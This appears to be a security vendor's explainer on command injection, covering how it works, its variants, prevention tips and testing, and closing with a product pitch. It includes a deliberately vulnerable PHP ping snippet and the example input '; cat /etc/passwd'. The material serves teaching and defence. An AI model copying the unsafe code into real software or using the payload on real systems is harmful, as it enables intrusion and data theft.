Command injection is a common security vulnerability. Injection attacks are #1 on the OWASP Top Ten List of globally recognized web application security risks, with command injection being one of the most popular types of injections.
A command injection vulnerability allows an attacker to execute arbitrary system commands on the attacked party’s host operating system (OS). By doing this, they can override the original command to gain access to a system, obtain sensitive data, or even execute an entire takeover of the application server or system.
Some typical examples of command injection attacks include insertion of harmful files into the runtime environment of the vulnerable application’s server, shell command execution, and abuse configuration file vulnerabilities.
Table of contents
Check if your Website is vulnerable to Command Injection
The Basics About Command Injection Vulnerabilities
A command injection attack can occur with web applications that run OS commands to interact with the host OS and the file system. They do this to execute system commands, start applications in a different language, or execute shell, Python, Perl, or PHP scripts. While this functionality is standard, it can be used for cyber attacks.
The main loophole through which command injection can be executed is when user-supplied input is not validated in applications. This input is used in the construction of commands that will be executed. Such cyber-attacks are possible when a web application passes the unverified user input (cookies, forms, HTTP headers, and the like) directly to OS functions like exec() and system(). The input is always a string (string cmd) linked to a constant string of the application, which shapes the full command.
Command injection is also known as shell injection. The arbitrary commands that the attacker applies to the system shell of the webserver running the application can compromise all relevant data. The command injection can also be used to attack other systems in the infrastructure connected to and trusted by the initial one. This is how the attacker can use the privileges of the targeted application to gain wider control over the system.
Most OS command injections are blind security risks. This is because the targeted application doesn’t bring back the command output within the HTTP response. Still, blind injections are a security threat and can be used for compromising a system.
Command Injection Security Assessment Level
The Differences Between Command Injection and Code Injection
While they seem similar, code injection and command injection are different types of vulnerabilities.
Code injection entails that an attacker inserts new malicious code into a vulnerable application, which executes. The attack is based on insufficient input validation of the malicious version of user data. Therefore, the code injection attack is limited to the functionalities of the application that is being targeted.
In contrast, a command injection is a case when an attacker modifies the default function of the application that executes system commands. Thus, no new code is being inserted. However, with a command injection, an attacker can target the server or systems of the application and other trusted infrastructure by using the compromised application’s privileges.
Methods for Command Injection
A command injection attack can happen due to various types of vulnerabilities.
Here are some common ones:
- Arbitrary command injections: applications that allow a malicious user to run arbitrary commands can be attacked in this way
- Insecure deserialization: executing deserialization without performing proper input validation can lead to command injections
- XML external entity injection (XXE): if an application uses an XML parser that hasn’t been configured properly to parse user XML input, this can lead to Denial of Service attacks, server-side request forgery (SSRF), and breaches to vulnerable data
- Arbitrary file inclusion/upload: applications that allow users to upload files with arbitrary files extensions can be vulnerable to command injections through malicious commands when inserting into the webroot
- Server-side template injection (SSTI): applications that use server-side templates to generate dynamic HTML responses may be vulnerable to insertion of harmful server-side templates if unsafe user-supplied data is included in a template
Examples of Command Injection
Malicious attackers can escape the ping command by adding a semicolon and executing arbitrary attacker-supplied operating system commands.
<?php $ip = $_POST['ip']; $cmd = system('ping '.$ip); echo $cmd ?>
Example input: ; cat /etc/passwd
To ensure your web application is not vulnerable to command injections, you’ll have to validate all user input and only allow commands needed for the task. You can also clean up user input by removing special characters like ; (semi-colon), and other shell escapes like &, &&, |, ||, <.
How to Prevent Command Injection
There are proven ways to limit the situations in which command injections can be executed in your systems.
Here are the most useful tips for applying:
- Limit the use of shell command execution functions as much as possible
- Employ a trusted API for user input into your application, especially when
running system commands such as execFile()
- Always validate user input that will be feeding into a shell execution command, which entails having a sound input validation strategy
- Filter potentially problematic special characters by using an allowlist for user input or by targeting command-related terms and delimiters
- Encode user input before using it in commands to avoid command-related characters being read as elements of the command or as a delimiter, as well as malformed inputs
- Parameterize user input or limit it to certain data sections of the command to avoid the input being read as an element of the command
- Make sure users can’t get control over the name of an application by using execFile() securely
A command injection vulnerability exists when user-supplied input is not validated correctly by the web application. The following snippet shows PHP code that is vulnerable to command injection.
Testing for Command Injection Vulnerabilities
Application security is a top priority, so it’s important to check your systems’ critical vulnerability risks regularly.
To check for blind command injections, you can use various detection techniques, such as time delays, redirecting output and checking the file manually, or running an OOB network interaction with an external server.
You can use some common parameters to test for operating system command injections:
You can easily try out Crashtest Security’s Vulnerability Testing Software to spot command injection risks and prevent potential attacks.